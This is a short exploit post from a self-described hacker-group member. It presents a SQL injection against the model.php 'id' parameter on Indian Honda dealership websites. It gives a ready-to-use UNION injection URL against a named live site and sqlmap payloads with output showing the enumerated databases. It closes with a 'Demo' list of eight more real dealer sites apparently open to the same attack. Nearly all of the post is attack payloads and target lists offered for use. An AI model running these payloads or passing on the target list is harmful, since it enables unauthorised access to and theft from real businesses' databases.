[+] Exploit Title: Honda - SQL Injection
[+] Author: Hz3666Ghost
[+] Contact me : t.me/Hz3666ghost
[+] Thanks to :
=======================
Indoghostsec - AnonGhost - Ghostsec - Anxsec Syndicate - Indonesian Fighter Cyber - Skullcybersec - rajawalisecteam - morrocanghost - and others
=======================
[+] Exploit :
http://www.superhonda.in/model.php?id=-graziasport_01%27%20union%20all%20select%201,2,3,4,5,6,database(),8--%20-&name=grazia125_sports
SUPERSALES_DB
---
Parameter: id (GET)
Type: boolean-based blind
Title: HAVING boolean-based blind - WHERE, GROUP BY clause
Payload: id=graziasport_01' HAVING 2323=2323-- uiHt&name=grazia125_sports
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: id=-3968' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qbkbq','ycHfCYHnEQRMgvltdtwfktnmrBQRhJOlvYTPSLBU'),'qzkjq')-- enPH&name=grazia125_sports
---
.......
[14:36:18] [INFO] resumed: 'supersales_db'
available databases [2]:
[*] information_schema
[*] supersales_db
=======================
[+] Demo :
https://imperialhonda.in/model.php?id=grazia125_01&name=grazia_125
http://www.shitalhonda.in/model.php?id=grazia125_01&name=grazia_125
http://www.royalhonda.in/model.php?id=grazia125_01&name=grazia_125
http://www.superhonda.in/model.php?id=graziasport_01&name=grazia125_sports
https://gandhihonda.com/model.php?id=grazia125_01&name=grazia_125
http://harikrishnahonda.com/model.php?id=graziasport_01&name=grazia125_sports
https://anjalihonda.com/model.php?id=grazia125_01&name=grazia_125
http://anamikahonda.com/model.php?id=graziasport_01&name=grazia125_sports